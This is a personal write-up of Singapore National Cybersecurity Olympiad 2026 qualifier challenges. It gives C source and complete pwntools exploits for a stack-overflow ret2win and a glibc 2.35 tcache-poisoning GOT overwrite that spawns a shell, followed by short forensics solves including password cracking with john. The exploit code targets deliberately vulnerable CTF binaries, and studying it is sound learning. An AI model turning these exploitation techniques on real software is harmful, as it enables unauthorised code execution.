Preamble#

On the 7th of March 2026, I participated in the qualifiers for Singapore’s National Cybersecurity Olympiad (NCO) 2026. Whilst my performance was lower than I expected, I nonetheless had an interesting time doing the challenges, especially without internet access. Here are the writeups for some of the challenges I solved/upsolved.

Pwn#

On hindsight, I massively threw this category and under-performed, clinching a grand total of zero points during the competition — some of which I could have solved during the competition itself. Here are the challenges I upsolved soon after.

Pwn-Sum#

1
#include <stdio.h>
2
#include <stdlib.h>
3
#include <stdint.h>
4

5
void win() {
6
    system("cat flag.txt");
7
    exit(0);
8
}
9

10
int main() {
11
    setvbuf(stdout, NULL, _IONBF, 0);
12
    setvbuf(stdin, NULL, _IONBF, 0);
13
    printf("Welcome to the calculator! Enter 0 to finish.\n");
14
    int64_t arr[100] = {0};
15
    int nums = 0;
16
    do {
17
        printf("Enter number %llu: ", nums + 1);
18
        scanf("%lld", &arr[nums]);
19
        nums++;
20
    } while(arr[nums-1] != 0);
21
    int64_t sum = 0;
22
    for (int i = 0; i < nums; i++) {
23
        sum += arr[i];
24
    }
25
    printf("The total sum is: %lld\n", sum);
26
    return 0;
27
}

Looking at the source code provided, we immediately see that it is some sort of ret2win challenge. We are provided with a loop that infinitely reads a 64bit number into increasing indexes of the array arr. This allows us to gain arbitrary write capabilities, allowing us to overwrite the return pointer in the stack for main() and return to win().

1
NCO/pwn/pwn-sum via  v15.2.1-gcc via  v3.13.12 (.venv)
2
❯ checksec chal_patched
3
[*] '/home/sherlock/Documents/CTF/NCO/pwn/pwn-sum/chal_patched'
4
    Arch:       amd64-64-little
5
    RELRO:      Partial RELRO
6
    Stack:      No canary found
7
    NX:         NX enabled
8
    PIE:        No PIE (0x400000)
9
    RUNPATH:    b'.'
10
    Stripped:   No
11
    Debuginfo:  Yes

Looking at checksec, we see that there is no canary and no PIE, which means that we are able to directly overwrite the return pointer by writing to indexes num > 100.

IDA stack view

Looking at the stack layout for main() in IDA, we can see that we will need to overwrite 0x340 + 0x8 = 0x348 bytes of data in order to reach the return pointer. This means that we will have to write 0x69 (105) values to the array.

However, we must take care not to overwrite num, as the top 4 bytes of the value when num = 103 is num. Hence, for when num = 103, we need to input 103 << 32 in order to not corrupt the num value.

Hence:

1
#!/usr/bin/env python3
2

3
from pwn import *
4

5
exe = ELF("./chal_patched")
6
libc = ELF("./libc.so.6")
7
ld = ELF("./ld-linux-x86-64.so.2")
8

9
context.binary = exe
10
context.terminal = ["zellij", "action", "new-pane", "--"]
11
context.gdb_binary = "/usr/bin/pwndbg"
12

13
gdbscript = """
14
set breakpoint pending on
15
b *0x0000000000401267
16
continue
17
"""
18

19

20
def conn():
21
    if args.LOCAL:
22
        r = process([exe.path])
23
        if args.GDB:
24
            gdb.attach(r, gdbscript=gdbscript)
25
            pause()
26
    else:
27
        r = remote("addr", 1337)
28

29
    return r
30

31

32
def main():
33
    r = conn()
34
    for i in range(0, 103):
35
        r.sendlineafter(b": ", b"1")
36
    # do not clobber 103 nums
37
    r.sendlineafter(b": ", str(103 << 32).encode())
38
    r.sendlineafter(b": ", b"1")
39
    ret = 0x000000000040117A
40
    r.sendlineafter(b": ", str(ret).encode())
41
    r.sendlineafter(b": ", b"0")
42
    r.interactive()
43

44

45
if __name__ == "__main__":
46
    main()

This should have been quite a simple solve, but I ran out of time due to being choked at pwn-flag-shop.

Pwn-Delta#

1
#include <malloc.h>
2

3
#define MAX 0x7
4

5
void *allocs[MAX];
6

7
int get_num() {
8
  char buf[0x20];
9
  fgets(buf, 0x20, stdin);
10
  return atoi(buf);
11
}
12

13
int get_idx() {
14
  int idx = get_num();
15
  if (idx < 0 || idx >= MAX) {
16
    puts("invalid idx");
17
    return -1;
18
  }
19
  return idx;
20
}
21

22
void create() {
23
  int idx = 0;
24
  int size = 0;
25

26
  printf("idx > ");
27
  idx = get_idx();
28
  if (idx == -1) {
29
    return;
30
  }
31

32
  printf("size > ");
33
  size = get_num();
34
  if (size < 0 || size > 0x1000) {
35
    puts("invalid size");
36
    return;
37
  }
38

39
  allocs[idx] = malloc(size);
40

41
  printf("input > ");
42
  fgets(allocs[idx], size, stdin);
43
}
44

45
void delete() {
46
  int idx = 0;
47

48
  printf("idx > ");
49
  idx = get_idx();
50
  if (idx == -1) {
51
    return;
52
  }
53

54
  if (allocs[idx] == NULL) {
55
    puts("invalid idx");
56
    return;
57
  }
58

59
  free(allocs[idx]);
60
}
61

62
void edit() {
63
  int idx = 0;
64
  int delta = 0;
65

66
  printf("idx > ");
67
  idx = get_idx();
68
  if (idx == -1) {
69
    return;
70
  }
71

72
  if (allocs[idx] == NULL) {
73
    puts("invalid idx");
74
    return;
75
  }
76

77
  printf("delta > ");
78
  delta = get_num();
79
  if (delta < -0x1000 || delta > 0x1000) {
80
    puts("invalid change");
81
    return;
82
  }
83

84
  *(size_t *)allocs[idx] += delta;
85
}
86

87
void read() {
88
  int idx = 0;
89
  printf("idx > ");
90
  idx = get_idx();
91
  if (idx == -1) {
92
    return;
93
  }
94

95
  if (allocs[idx] == NULL) {
96
    puts("invalid idx");
97
    return;
98
  }
99

100
  printf("content: ");
101
  puts(allocs[idx]);
102
}
103

104
void menu() {
105
  puts("1. create");
106
  puts("2. delete");
107
  puts("3. edit");
108
  puts("4. read");
109
  printf("> ");
110
}
111

112
void setup() {
113
  setbuf(stdin, NULL);
114
  setbuf(stdout, NULL);
115
  setbuf(stderr, NULL);
116
}
117

118
int main() {
119
  setup();
120
  char buf[0x20];
121
  int choice = 0;
122

123
  while (1) {
124
    menu();
125
    fgets(buf, 0x20, stdin);
126
    choice = atoi(buf);
127
    switch (choice) {
128
      case 1:
129
        create();
130
        break;
131
      case 2:
132
        delete();
133
        break;
134
      case 3:
135
        edit();
136
        break;
137
      case 4:
138
        read();
139
        break;
140
      default:
141
        puts("invalid choice");
142
    }
143
  }
144
}

We see the use of malloc() and free(), hence it immediately jumps out as a heap challenge. edit() allows us to commit a use-after-free (UAF), hence this is probably some heap bin metadata corruption challenge. We can use tcache poisoning in order to overwrite some function’s address to pop a shell, however, since this challenge uses libc 2.35, we need to work around some safety mitigations.

We observe that the edit() function only allows us to touch the first 8 bytes of the tcache structure, hence we are unable to corrupt the bk (key) in order to commit a double free. That is ok though, we can still use edit() to incrementally increase/decrease the hex value in the first 8 bytes.

Furthermore, in libc > 2.32, the fd of the tcache is mangled using mangled_ptr = next_ptr ^ (this_ptr >> 12). This means that we have to leak what (this_ptr >> 12) could possibly be. This can be achieved by leaking the fd of the chunk at the end of the tcache bin, where mangled_ptr = NULL ^ (this_ptr >> 12). Since it is xored by null, we can get (this_ptr >> 12), and if we allocate chunks A and B such that head -> B -> A and A and B are close by on the same heap page, we can use the value of (this_ptr >> 12) from A for B (as right-shifting by 12 discards the last 3 “nibbles” of the address) to find the address of A, and therefore, the address of B.

In order to call system, we also need to leak the base of libc. This can be done via the unsorted bin, where the fd of the end of the unsorted bin points to main_arena+96 in libc. By leaking the fd, we can calculate the base of libc.

To pop a shell, we can simply overwrite the got of a function with system(). Here, I chose atoli() for convenience. We overwrite the tcache fd for a chunk to the got for atoli() using edit(), and when allocated with malloc() we can set it to system().

Just to make sure the GOT is writable:

1
NCO/pwn/pwn-delta via  v15.2.1-gcc via  v3.13.12 (.venv)
2
❯ checksec chal_patched
3
[*] '/home/sherlock/Documents/CTF/NCO/pwn/pwn-delta/chal_patched'
4
    Arch:       amd64-64-little
5
    RELRO:      Partial RELRO
6
    Stack:      No canary found
7
    NX:         NX enabled
8
    PIE:        No PIE (0x3fe000)
9
    RUNPATH:    b'.'
10
    Stripped:   No

Hence:

1
#!/usr/bin/env python3
2

3
from pwn import *
4

5
exe = ELF("./chal_patched")
6
libc = ELF("./libc.so.6")
7
ld = ELF("./ld-2.35.so")
8

9
context.binary = exe
10
context.terminal = ["zellij", "action", "new-pane", "--"]
11
context.gdb_binary = "/usr/bin/pwndbg"
12

13
gdbscript = """
14
set breakpoint pending on
15
b *0x00000000004014FF
16
continue
17
"""
18

19

20
def conn():
21
    if args.LOCAL:
22
        r = process([exe.path])
23
        if args.GDB:
24
            gdb.attach(r, gdbscript=gdbscript)
25
            pause()
26
    else:
27
        r = remote("addr", 1337)
28

29
    return r
30

31

32
def main():
33
    r = conn()
34

35
    def alloc(size, idx, data):
36
        r.sendlineafter(b"> ", b"1")
37
        r.sendlineafter(b"idx > ", str(idx).encode())
38
        r.sendlineafter(b"size > ", str(size).encode())
39
        r.sendlineafter(b"input > ", data)
40

41
    def free(idx):
42
        r.sendlineafter(b"> ", b"2")
43
        r.sendlineafter(b"idx > ", str(idx).encode())
44

45
    def edit(idx, data):
46
        r.sendlineafter(b"> ", b"3")
47
        r.sendlineafter(b"idx > ", str(idx).encode())
48
        r.sendlineafter(b"delta > ", str(data).encode())
49

50
    def view(idx):
51
        r.sendlineafter(b"> ", b"4")
52
        r.sendlineafter(b"idx > ", str(idx).encode())
53
        r.recvuntil(b"content: ")
54
        return r.recvline()[:-1]
55

56
    # libc leak via unsorted
57
    alloc(0x500, 0, b"U")
58
    alloc(0x20, 1, b"guard")
59
    free(0)
60
    libc_main_arena = u64(view(0)[:6].ljust(8, b"\x00"))
61
    libc_base = libc_main_arena - libc.sym["main_arena"] - 96
62
    info(f"libc leak: {hex(libc_main_arena)}, libc base: {hex(libc_base)}")
63
    alloc(0x20, 0, b"A")
64
    alloc(0x20, 1, b"B")
65
    alloc(0x20, 2, b"C")
66
    free(0)
67
    free(1)
68
    free(2)
69
    # head -> C -> B -> A
70
    # Need to unmangle pointers
71
    a_mangled = u64(view(0)[:6].ljust(8, b"\x00"))  # a_addr >> 12
72
    b_mangled = u64(view(1)[:6].ljust(8, b"\x00"))  # a_addr ^ (b_addr >> 12)
73

74
    a_addr = b_mangled ^ a_mangled
75
    b_addr = a_addr + 0x30
76
    b_key = b_addr >> 12
77

78
    info(f"A addr: {hex(a_addr)}, B addr: {hex(b_addr)}, b_key: {hex(b_key)}")
79
    # mangle B to point at atoi got instead
80
    atoli_mangled = exe.got["atoi"] ^ b_key
81
    delta = atoli_mangled - b_mangled
82
    info(f"delta: {delta}")
83
    remaining = delta
84
    while remaining != 0:
85
        if remaining > 0x1000:
86
            edit(1, 0x1000)
87
            remaining -= 0x1000
88
            info(remaining)
89
        elif remaining < -0x1000:
90
            edit(1, -0x1000)
91
            info(remaining)
92
            remaining += 0x1000
93
        else:
94
            edit(1, remaining)
95
            remaining = 0
96
    # head -> C -> B -> atoli
97
    alloc(0x20, 3, b"D")
98
    alloc(0x20, 4, b"E")
99
    alloc(0x20, 5, p64(libc_base + libc.sym["system"]))
100
    # atoli written with system
101
    r.sendlineafter(b"> ", b"/bin/sh\x00")
102
    r.interactive()
103

104

105
if __name__ == "__main__":
106
    main()

Forensics#

Forensics was honestly ok, barring some sneaky tricks put in by the chall authors.

Forensics-Chat#

We are provided with a Wireshark .pcap which contains IRC chat logs, as well as FTP TCP streams. Inspecting the chat logs, we learn that the user is downloading a pdf from the FTP server with the password potato_croquette. Hence, we can follow the FTP TCP stream to extract the bytes:

1
from pwn import * # yes pwntools do not question
2

3
file = b""
4
segments = [
5
    # B64-encoded segments of the tcp data go here
6
]
7
for i in segments:
8
    file += b64d(i)
9
write("flag.pdf", file)

Opening the pdf, however, we observe that it is blank and white. How could that be?

Well, it turns out that there are text elements hidden in white. Hahaha.

Image of PDF

Forensics-disk#

This was rather trivial, so here are my condensed solve steps:

Mount the image into ftk imager
Observe that there is flag.zip and a note that says it uses insecure 5 digit password
Extract flag.zip and run it through zip2john and john
Extract the contents with cracked password and profit

Honestly quite an easy disk forensics task.

Epilogue#

To be very frank, I felt that I could have done much better for NCO 2026 Qualifiers as a whole. More room for improvement, I guess.